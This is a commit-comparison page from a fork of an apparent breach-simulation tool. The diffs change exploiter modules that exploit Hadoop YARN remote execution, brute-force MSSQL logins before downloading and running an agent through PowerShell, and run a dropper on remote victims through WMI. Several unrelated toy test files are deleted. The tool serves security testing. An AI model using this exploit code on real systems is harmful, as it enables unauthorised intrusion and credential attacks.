forked from p34709852/monkey
Compare commits
4 Commits
develop
...
2269-publi
Author | SHA1 | Date |
---|---|---|
Ilija Lazoroski | d1427117c7 | |
Ilija Lazoroski | 6950dcdf0c | |
Ilija Lazoroski | c09c2c2127 | |
Ilija Lazoroski | ed191bcf61 |
|
@ -1,13 +0,0 @@
|
|||
import json
|
||||
data = {
|
||||
'name' : 'myname',
|
||||
'age' : 100,
|
||||
}
|
||||
# separators:是分隔符的意思,参数意思分别为不同dict项之间的分隔符和dict项内key和value之间的分隔符,把:和,后面的空格都除去了.
|
||||
# dumps 将python对象字典转换为json字符串
|
||||
json_str = json.dumps(data, separators=(',', ':'))
|
||||
print(type(json_str), json_str)
|
||||
|
||||
# loads 将json字符串转化为python对象字典
|
||||
pyton_obj = json.loads(json_str)
|
||||
print(type(pyton_obj), pyton_obj)
|
|
@ -5,20 +5,13 @@
|
|||
"""
|
||||
|
||||
import json
|
||||
import logging
|
||||
import posixpath
|
||||
import random
|
||||
import string
|
||||
from time import time
|
||||
|
||||
import requests
|
||||
|
||||
from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT
|
||||
from common.tags import (
|
||||
T1105_ATTACK_TECHNIQUE_TAG,
|
||||
T1203_ATTACK_TECHNIQUE_TAG,
|
||||
T1210_ATTACK_TECHNIQUE_TAG,
|
||||
)
|
||||
from infection_monkey.exploit.tools.helpers import get_agent_dst_path
|
||||
from infection_monkey.exploit.tools.http_tools import HTTPTools
|
||||
from infection_monkey.exploit.web_rce import WebRCE
|
||||
|
@ -30,10 +23,6 @@ from infection_monkey.model import (
|
|||
)
|
||||
from infection_monkey.utils.commands import build_monkey_commandline
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
HADOOP_EXPLOITER_TAG = "hadoop-exploiter"
|
||||
|
||||
|
||||
class HadoopExploiter(WebRCE):
|
||||
_EXPLOITED_SERVICE = "Hadoop"
|
||||
|
@ -43,43 +32,39 @@ class HadoopExploiter(WebRCE):
|
|||
# Random string's length that's used for creating unique app name
|
||||
RAN_STR_LEN = 6
|
||||
|
||||
_EXPLOITER_TAGS = (HADOOP_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG, T1210_ATTACK_TECHNIQUE_TAG)
|
||||
|
||||
_PROPAGATION_TAGS = (HADOOP_EXPLOITER_TAG, T1105_ATTACK_TECHNIQUE_TAG)
|
||||
|
||||
def __init__(self):
|
||||
super(HadoopExploiter, self).__init__()
|
||||
|
||||
def _exploit_host(self):
|
||||
# Try to get potential urls
|
||||
potential_urls = self.build_potential_urls(self.host.ip_addr, self.HADOOP_PORTS)
|
||||
if not potential_urls:
|
||||
self.exploit_result.error_message = (
|
||||
f"No potential exploitable urls has been found for {self.host}"
|
||||
)
|
||||
# Try to get exploitable url
|
||||
urls = self.build_potential_urls(self.host.ip_addr, self.HADOOP_PORTS)
|
||||
self.add_vulnerable_urls(urls, True)
|
||||
if not self.vulnerable_urls:
|
||||
return self.exploit_result
|
||||
|
||||
monkey_path_on_victim = get_agent_dst_path(self.host)
|
||||
try:
|
||||
monkey_path_on_victim = get_agent_dst_path(self.host)
|
||||
except KeyError:
|
||||
return self.exploit_result
|
||||
|
||||
http_path, http_thread = HTTPTools.create_locked_transfer(
|
||||
self.host, str(monkey_path_on_victim), self.agent_binary_repository
|
||||
)
|
||||
|
||||
command = self._build_command(monkey_path_on_victim, http_path)
|
||||
try:
|
||||
for url in potential_urls:
|
||||
if self.exploit(url, command):
|
||||
self.add_executed_cmd(command)
|
||||
self.exploit_result.exploitation_success = True
|
||||
self.exploit_result.propagation_success = True
|
||||
break
|
||||
command = self._build_command(monkey_path_on_victim, http_path)
|
||||
|
||||
if self.exploit(self.vulnerable_urls[0], command):
|
||||
self.add_executed_cmd(command)
|
||||
self.exploit_result.exploitation_success = True
|
||||
self.exploit_result.propagation_success = True
|
||||
finally:
|
||||
http_thread.join(self.DOWNLOAD_TIMEOUT)
|
||||
http_thread.stop()
|
||||
|
||||
return self.exploit_result
|
||||
|
||||
def exploit(self, url: str, command: str):
|
||||
def exploit(self, url, command):
|
||||
if self._is_interrupted():
|
||||
self._set_interrupted()
|
||||
return False
|
||||
|
@ -88,8 +73,8 @@ class HadoopExploiter(WebRCE):
|
|||
resp = requests.post(
|
||||
posixpath.join(url, "ws/v1/cluster/apps/new-application"), timeout=LONG_REQUEST_TIMEOUT
|
||||
)
|
||||
resp_dict = json.loads(resp.content)
|
||||
app_id = resp_dict["application-id"]
|
||||
resp = json.loads(resp.content)
|
||||
app_id = resp["application-id"]
|
||||
|
||||
# Create a random name for our application in YARN
|
||||
# random.SystemRandom can block indefinitely in Linux
|
||||
|
@ -102,16 +87,10 @@ class HadoopExploiter(WebRCE):
|
|||
self._set_interrupted()
|
||||
return False
|
||||
|
||||
timestamp = time()
|
||||
resp = requests.post(
|
||||
posixpath.join(url, "ws/v1/cluster/apps/"), json=payload, timeout=LONG_REQUEST_TIMEOUT
|
||||
)
|
||||
|
||||
success = resp.status_code == 202
|
||||
message = "" if success else f"Failed to exploit via {url}"
|
||||
self._publish_exploitation_event(timestamp, success, error_message=message)
|
||||
self._publish_propagation_event(timestamp, success, error_message=message)
|
||||
return success
|
||||
return resp.status_code == 202
|
||||
|
||||
def check_if_exploitable(self, url):
|
||||
try:
|
||||
|
|
|
@ -1,18 +1,12 @@
|
|||
import logging
|
||||
from pathlib import PureWindowsPath
|
||||
from time import sleep, time
|
||||
from typing import Iterable, Optional, Tuple
|
||||
from time import sleep
|
||||
from typing import Sequence, Tuple
|
||||
|
||||
import pymssql
|
||||
|
||||
from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT
|
||||
from common.credentials import get_plaintext
|
||||
from common.tags import (
|
||||
T1059_ATTACK_TECHNIQUE_TAG,
|
||||
T1105_ATTACK_TECHNIQUE_TAG,
|
||||
T1110_ATTACK_TECHNIQUE_TAG,
|
||||
T1210_ATTACK_TECHNIQUE_TAG,
|
||||
)
|
||||
from common.utils.exceptions import FailedExploitationError
|
||||
from infection_monkey.exploit.HostExploiter import HostExploiter
|
||||
from infection_monkey.exploit.tools.helpers import get_agent_dst_path
|
||||
|
@ -26,8 +20,6 @@ from infection_monkey.utils.threading import interruptible_iter
|
|||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
MSSQL_EXPLOITER_TAG = "mssql-exploiter"
|
||||
|
||||
|
||||
class MSSQLExploiter(HostExploiter):
|
||||
_EXPLOITED_SERVICE = "MSSQL"
|
||||
|
@ -44,20 +36,13 @@ class MSSQLExploiter(HostExploiter):
|
|||
"DownloadFile(^''{http_path}^'' , ^''{dst_path}^'')"
|
||||
)
|
||||
|
||||
_EXPLOITER_TAGS = (MSSQL_EXPLOITER_TAG, T1110_ATTACK_TECHNIQUE_TAG, T1210_ATTACK_TECHNIQUE_TAG)
|
||||
_PROPAGATION_TAGS = (
|
||||
MSSQL_EXPLOITER_TAG,
|
||||
T1059_ATTACK_TECHNIQUE_TAG,
|
||||
T1105_ATTACK_TECHNIQUE_TAG,
|
||||
)
|
||||
|
||||
def __init__(self):
|
||||
super().__init__()
|
||||
self.cursor = None
|
||||
self.agent_http_path = None
|
||||
|
||||
def _exploit_host(self) -> ExploiterResultData:
|
||||
agent_path_on_victim = PureWindowsPath(get_agent_dst_path(self.host))
|
||||
agent_path_on_victim = get_agent_dst_path(self.host)
|
||||
|
||||
# Brute force to get connection
|
||||
creds = generate_identity_secret_pairs(
|
||||
|
@ -67,18 +52,16 @@ class MSSQLExploiter(HostExploiter):
|
|||
try:
|
||||
self.cursor = self._brute_force(self.host.ip_addr, self.SQL_DEFAULT_TCP_PORT, creds)
|
||||
except FailedExploitationError:
|
||||
error_message = (
|
||||
logger.info(
|
||||
f"Failed brute-forcing of MSSQL server on {self.host},"
|
||||
f" no credentials were successful"
|
||||
)
|
||||
logger.error(error_message)
|
||||
return self.exploit_result
|
||||
|
||||
if self._is_interrupted():
|
||||
self._set_interrupted()
|
||||
return self.exploit_result
|
||||
|
||||
timestamp = time()
|
||||
try:
|
||||
self._upload_agent(agent_path_on_victim)
|
||||
self._run_agent(agent_path_on_victim)
|
||||
|
@ -89,17 +72,15 @@ class MSSQLExploiter(HostExploiter):
|
|||
)
|
||||
|
||||
logger.error(error_message)
|
||||
self._publish_propagation_event(timestamp, False, error_message=error_message)
|
||||
self.exploit_result.error_message = error_message
|
||||
|
||||
return self.exploit_result
|
||||
|
||||
self._publish_propagation_event(timestamp, True)
|
||||
self.exploit_result.propagation_success = True
|
||||
return self.exploit_result
|
||||
|
||||
def _brute_force(
|
||||
self, host: str, port: str, users_passwords_pairs_list: Iterable[Tuple[str, str]]
|
||||
self, host: str, port: str, users_passwords_pairs_list: Sequence[Tuple[str, str]]
|
||||
) -> pymssql.Cursor:
|
||||
"""
|
||||
Starts the brute force connection attempts and if needed then init the payload process.
|
||||
|
@ -125,7 +106,6 @@ class MSSQLExploiter(HostExploiter):
|
|||
)
|
||||
|
||||
for user, password in credentials_iterator:
|
||||
timestamp = time()
|
||||
try:
|
||||
# Core steps
|
||||
# Trying to connect
|
||||
|
@ -142,14 +122,14 @@ class MSSQLExploiter(HostExploiter):
|
|||
)
|
||||
self.exploit_result.exploitation_success = True
|
||||
self.add_vuln_port(MSSQLExploiter.SQL_DEFAULT_TCP_PORT)
|
||||
self._report_login_attempt(timestamp, True, user, password)
|
||||
self.report_login_attempt(True, user, password)
|
||||
cursor = conn.cursor()
|
||||
|
||||
return cursor
|
||||
except pymssql.OperationalError as err:
|
||||
error_message = f"Connection to MSSQL failed: {err}"
|
||||
logger.info(error_message)
|
||||
self._report_login_attempt(timestamp, False, user, password, error_message)
|
||||
logger.info(f"Connection to MSSQL failed: {err}")
|
||||
self.report_login_attempt(False, user, password)
|
||||
# Combo didn't work, hopping to the next one
|
||||
pass
|
||||
|
||||
logger.warning(
|
||||
"No user/password combo was able to connect to host: {0}:{1}, "
|
||||
|
@ -159,23 +139,14 @@ class MSSQLExploiter(HostExploiter):
|
|||
"Bruteforce process failed on host: {0}".format(self.host.ip_addr)
|
||||
)
|
||||
|
||||
def _report_login_attempt(
|
||||
self, timestamp: float, success: bool, user, password: str, message: str = ""
|
||||
):
|
||||
self._publish_exploitation_event(timestamp, success, error_message=message)
|
||||
self.report_login_attempt(success, user, password)
|
||||
|
||||
def _upload_agent(self, agent_path_on_victim: PureWindowsPath):
|
||||
http_thread = self._start_agent_server(agent_path_on_victim)
|
||||
|
||||
self._run_agent_download_command(agent_path_on_victim)
|
||||
|
||||
if http_thread:
|
||||
MSSQLExploiter._stop_agent_server(http_thread)
|
||||
MSSQLExploiter._stop_agent_server(http_thread)
|
||||
|
||||
def _start_agent_server(
|
||||
self, agent_path_on_victim: PureWindowsPath
|
||||
) -> Optional[LockedHTTPServer]:
|
||||
def _start_agent_server(self, agent_path_on_victim: PureWindowsPath) -> LockedHTTPServer:
|
||||
self.agent_http_path, http_thread = HTTPTools.create_locked_transfer(
|
||||
self.host, str(agent_path_on_victim), self.agent_binary_repository
|
||||
)
|
||||
|
@ -208,7 +179,7 @@ class MSSQLExploiter(HostExploiter):
|
|||
|
||||
def _build_agent_launch_command(self, agent_path_on_victim: PureWindowsPath) -> str:
|
||||
agent_args = build_monkey_commandline(
|
||||
self.servers, self.current_depth + 1, str(agent_path_on_victim)
|
||||
self.servers, self.current_depth + 1, agent_path_on_victim
|
||||
)
|
||||
|
||||
return f"{agent_path_on_victim} {DROPPER_ARG} {agent_args}"
|
||||
|
|
|
@ -3,7 +3,6 @@ import urllib.error
|
|||
import urllib.parse
|
||||
import urllib.request
|
||||
from threading import Lock
|
||||
from typing import Optional, Tuple
|
||||
|
||||
from infection_monkey.network.firewall import app as firewall
|
||||
from infection_monkey.network.info import get_free_tcp_port
|
||||
|
@ -29,7 +28,7 @@ class HTTPTools(object):
|
|||
@staticmethod
|
||||
def create_locked_transfer(
|
||||
host, dropper_target_path, agent_binary_repository, local_ip=None, local_port=None
|
||||
) -> Tuple[Optional[str], Optional[LockedHTTPServer]]:
|
||||
) -> LockedHTTPServer:
|
||||
"""
|
||||
Create http server for file transfer with a lock
|
||||
:param host: Variable with target's information
|
||||
|
|
|
@ -2,10 +2,16 @@ import logging
|
|||
import ntpath
|
||||
import socket
|
||||
import traceback
|
||||
from time import time
|
||||
|
||||
from impacket.dcerpc.v5.rpcrt import DCERPCException
|
||||
|
||||
from common.credentials import get_plaintext
|
||||
from common.tags import (
|
||||
T1021_ATTACK_TECHNIQUE_TAG,
|
||||
T1105_ATTACK_TECHNIQUE_TAG,
|
||||
T1110_ATTACK_TECHNIQUE_TAG,
|
||||
)
|
||||
from infection_monkey.exploit.HostExploiter import HostExploiter
|
||||
from infection_monkey.exploit.tools.helpers import get_agent_dst_path
|
||||
from infection_monkey.exploit.tools.smb_tools import SmbTools
|
||||
|
@ -21,10 +27,15 @@ from infection_monkey.utils.threading import interruptible_iter
|
|||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
WMI_EXPLOITER_TAG = "wmi-exploiter"
|
||||
|
||||
|
||||
class WmiExploiter(HostExploiter):
|
||||
_EXPLOITED_SERVICE = "WMI (Windows Management Instrumentation)"
|
||||
|
||||
_EXPLOITER_TAGS = (WMI_EXPLOITER_TAG, T1021_ATTACK_TECHNIQUE_TAG, T1110_ATTACK_TECHNIQUE_TAG)
|
||||
_PROPAGATION_TAGS = (WMI_EXPLOITER_TAG, T1105_ATTACK_TECHNIQUE_TAG)
|
||||
|
||||
@WmiTools.impacket_user
|
||||
@WmiTools.dcom_wrap
|
||||
def _exploit_host(self) -> ExploiterResultData:
|
||||
|
@ -44,6 +55,7 @@ class WmiExploiter(HostExploiter):
|
|||
|
||||
wmi_connection = WmiTools.WmiConnection()
|
||||
|
||||
timestamp = time()
|
||||
try:
|
||||
wmi_connection.connect(
|
||||
self.host,
|
||||
|
@ -55,26 +67,34 @@ class WmiExploiter(HostExploiter):
|
|||
)
|
||||
except AccessDeniedException:
|
||||
self.report_login_attempt(False, user, password, lm_hash, ntlm_hash)
|
||||
logger.debug(f"Failed connecting to {self.host} using WMI")
|
||||
error_message = f"Failed connecting to {self.host} using WMI"
|
||||
logger.debug(error_message)
|
||||
self._publish_exploitation_event(timestamp, False, error_message=error_message)
|
||||
continue
|
||||
except DCERPCException:
|
||||
self.report_login_attempt(False, user, password, lm_hash, ntlm_hash)
|
||||
logger.debug(f"Failed connecting to {self.host} using WMI")
|
||||
self._publish_exploitation_event(timestamp, False, error_message=error_message)
|
||||
continue
|
||||
|
||||
except socket.error:
|
||||
logger.debug(f"Network error in WMI connection to {self.host}")
|
||||
error_message = f"Network error in WMI connection to {self.host}"
|
||||
logger.debug(error_message)
|
||||
self._publish_exploitation_event(timestamp, False, error_message=error_message)
|
||||
return self.exploit_result
|
||||
|
||||
except Exception as exc:
|
||||
logger.debug(
|
||||
error_message = (
|
||||
f"Unknown WMI connection error to {self.host}: "
|
||||
f"{exc} {traceback.format_exc()}"
|
||||
)
|
||||
logger.debug(error_message)
|
||||
self._publish_exploitation_event(timestamp, False, error_message=error_message)
|
||||
return self.exploit_result
|
||||
|
||||
self.report_login_attempt(True, user, password, lm_hash, ntlm_hash)
|
||||
self.exploit_result.exploitation_success = True
|
||||
self._publish_exploitation_event(timestamp, True, error_message=error_message)
|
||||
|
||||
downloaded_agent = self.agent_binary_repository.get_agent_binary(self.host.os["type"])
|
||||
|
||||
|
@ -84,6 +104,7 @@ class WmiExploiter(HostExploiter):
|
|||
|
||||
target_path = get_agent_dst_path(self.host)
|
||||
|
||||
propagation_timestamp = time()
|
||||
remote_full_path = SmbTools.copy_file(
|
||||
self.host,
|
||||
downloaded_agent,
|
||||
|
@ -119,27 +140,23 @@ class WmiExploiter(HostExploiter):
|
|||
|
||||
if (0 != result.ProcessId) and (not result.ReturnValue):
|
||||
logger.info(
|
||||
"Executed dropper '%s' on remote victim %r (pid=%d, cmdline=%r)",
|
||||
remote_full_path,
|
||||
self.host,
|
||||
result.ProcessId,
|
||||
cmdline,
|
||||
f"Executed dropper '{remote_full_path}' on remote victim {self.host} "
|
||||
f"(pid={result.ProcessId}, cmdline={cmdline})"
|
||||
)
|
||||
|
||||
self.add_vuln_port(port="unknown")
|
||||
self.exploit_result.propagation_success = True
|
||||
self._publish_propagation_event(propagation_timestamp, True)
|
||||
else:
|
||||
error_message = (
|
||||
"Error executing dropper '%s' on remote victim %r (pid=%d, exit_code=%d, "
|
||||
"cmdline=%r)",
|
||||
remote_full_path,
|
||||
self.host,
|
||||
result.ProcessId,
|
||||
result.ReturnValue,
|
||||
cmdline,
|
||||
f"Error executing dropper '{remote_full_path}' on remote victim {self.host} "
|
||||
f"(pid={result.ProcessId}, exit_code={result.ReturnValue}, cmdline={cmdline})"
|
||||
)
|
||||
logger.debug(error_message)
|
||||
self.exploit_result.error_message = error_message
|
||||
self._publish_propagation_event(
|
||||
propagation_timestamp, False, error_message=error_message
|
||||
)
|
||||
|
||||
result.RemRelease()
|
||||
wmi_connection.close()
|
||||
|
|
|
@ -4,7 +4,7 @@ from typing import Union
|
|||
|
||||
from typing_extensions import TypeAlias
|
||||
|
||||
from common.agent_events import PingScanEvent, TCPScanEvent
|
||||
from common.agent_events import AbstractAgentEvent, PingScanEvent, TCPScanEvent
|
||||
from common.types import PortStatus, SocketAddress
|
||||
from monkey_island.cc.models import CommunicationType, Machine, Node
|
||||
from monkey_island.cc.repository import (
|
||||
|
@ -63,6 +63,10 @@ class ScanEventHandler:
|
|||
except (RetrievalError, StorageError, UnknownRecordError):
|
||||
logger.exception("Unable to process tcp scan data")
|
||||
|
||||
def _get_source_node(self, event: AbstractAgentEvent) -> Node:
|
||||
machine = self._get_source_machine(event)
|
||||
return self._node_repository.get_node_by_machine_id(machine.id)
|
||||
|
||||
def _get_target_machine(self, event: ScanEvent) -> Machine:
|
||||
try:
|
||||
target_machines = self._machine_repository.get_machines_by_ip(event.target)
|
||||
|
@ -75,14 +79,6 @@ class ScanEventHandler:
|
|||
self._machine_repository.upsert_machine(machine)
|
||||
return machine
|
||||
|
||||
def _get_source_node(self, event: ScanEvent) -> Node:
|
||||
machine = self._get_source_machine(event)
|
||||
return self._node_repository.get_node_by_machine_id(machine.id)
|
||||
|
||||
def _get_source_machine(self, event: ScanEvent) -> Machine:
|
||||
agent = self._agent_repository.get_agent_by_id(event.source)
|
||||
return self._machine_repository.get_machine_by_id(agent.machine_id)
|
||||
|
||||
def _update_target_machine_os(self, machine: Machine, event: PingScanEvent):
|
||||
if event.os is not None and machine.operating_system is None:
|
||||
machine.operating_system = event.os
|
||||
|
@ -104,5 +100,9 @@ class ScanEventHandler:
|
|||
|
||||
if tcp_connections:
|
||||
self._node_repository.upsert_tcp_connections(
|
||||
src_node.machine_id, {target_machine.id: tuple(tcp_connections)}
|
||||
src_node.machine_id, {target_machine.id: tcp_connections}
|
||||
)
|
||||
|
||||
def _get_source_machine(self, event: ScanEvent) -> Machine:
|
||||
agent = self._agent_repository.get_agent_by_id(event.source)
|
||||
return self._machine_repository.get_machine_by_id(agent.machine_id)
|
||||
|
|
File diff suppressed because it is too large
Load Diff
|
@ -77,7 +77,7 @@
|
|||
"classnames": "^2.3.1",
|
||||
"core-js": "^3.18.2",
|
||||
"crypto-js": "^4.1.1",
|
||||
"d3": "^7.6.1",
|
||||
"d3": "^5.14.1",
|
||||
"downloadjs": "^1.4.7",
|
||||
"fetch": "^1.1.0",
|
||||
"file-saver": "^2.0.5",
|
||||
|
|
13
test_dumps
13
test_dumps
|
@ -1,13 +0,0 @@
|
|||
import json
|
||||
data = {
|
||||
'name' : 'myname',
|
||||
'age' : 100,
|
||||
}
|
||||
# separators:是分隔符的意思,参数意思分别为不同dict项之间的分隔符和dict项内key和value之间的分隔符,把:和,后面的空格都除去了.
|
||||
# dumps 将python对象字典转换为json字符串
|
||||
json_str = json.dumps(data, separators=(',', ':'))
|
||||
print(type(json_str), json_str)
|
||||
|
||||
# loads 将json字符串转化为python对象字典
|
||||
pyton_obj = json.loads(json_str)
|
||||
print(type(pyton_obj), pyton_obj)
|
|
@ -1,13 +0,0 @@
|
|||
import json
|
||||
data = {
|
||||
'name' : 'myname',
|
||||
'age' : 100,
|
||||
}
|
||||
# separators:是分隔符的意思,参数意思分别为不同dict项之间的分隔符和dict项内key和value之间的分隔符,把:和,后面的空格都除去了.
|
||||
# dumps 将python对象字典转换为json字符串
|
||||
json_str = json.dumps(data, separators=(',', ':'))
|
||||
print(type(json_str), json_str)
|
||||
|
||||
# loads 将json字符串转化为python对象字典
|
||||
pyton_obj = json.loads(json_str)
|
||||
print(type(pyton_obj), pyton_obj)
|
|
@ -1,21 +0,0 @@
|
|||
import unittest
|
||||
from mock import Mock
|
||||
|
||||
|
||||
def VerifyPhone():
|
||||
'''
|
||||
校验用户手机号
|
||||
'''
|
||||
pass
|
||||
|
||||
|
||||
class TestVerifyPhone(unittest.TestCase):
|
||||
|
||||
def test_verify_phone(self):
|
||||
data = {"code": "0000", "msg": {"result": "success", "phoneinfo": "移动用户"}}
|
||||
VerifyPhone = Mock(return_value=data)
|
||||
self.assertEqual("success", VerifyPhone()["msg"]["result"])
|
||||
print('测试用例')
|
||||
|
||||
if __name__ == '__main__':
|
||||
unittest.main(verbosity=2)
|
|
@ -1,21 +0,0 @@
|
|||
import unittest
|
||||
from mock import Mock
|
||||
|
||||
|
||||
def VerifyPhone():
|
||||
'''
|
||||
校验用户手机号
|
||||
'''
|
||||
pass
|
||||
|
||||
|
||||
class TestVerifyPhone(unittest.TestCase):
|
||||
|
||||
def test_verify_phone(self):
|
||||
data = {"code": "0000", "msg": {"result": "success", "phoneinfo": "移动用户"}}
|
||||
VerifyPhone = Mock(return_value=data)
|
||||
self.assertEqual("success", VerifyPhone()["msg"]["result"])
|
||||
print('测试用例')
|
||||
|
||||
if __name__ == '__main__':
|
||||
unittest.main(verbosity=2)
|
|
@ -1,21 +0,0 @@
|
|||
import unittest
|
||||
from mock import Mock
|
||||
|
||||
|
||||
def VerifyPhone():
|
||||
'''
|
||||
校验用户手机号
|
||||
'''
|
||||
pass
|
||||
|
||||
|
||||
class TestVerifyPhone(unittest.TestCase):
|
||||
|
||||
def test_verify_phone(self):
|
||||
data = {"code": "0000", "msg": {"result": "success", "phoneinfo": "移动用户"}}
|
||||
VerifyPhone = Mock(return_value=data)
|
||||
self.assertEqual("success", VerifyPhone()["msg"]["result"])
|
||||
print('测试用例')
|
||||
|
||||
if __name__ == '__main__':
|
||||
unittest.main(verbosity=2)
|
Loading…
Reference in New Issue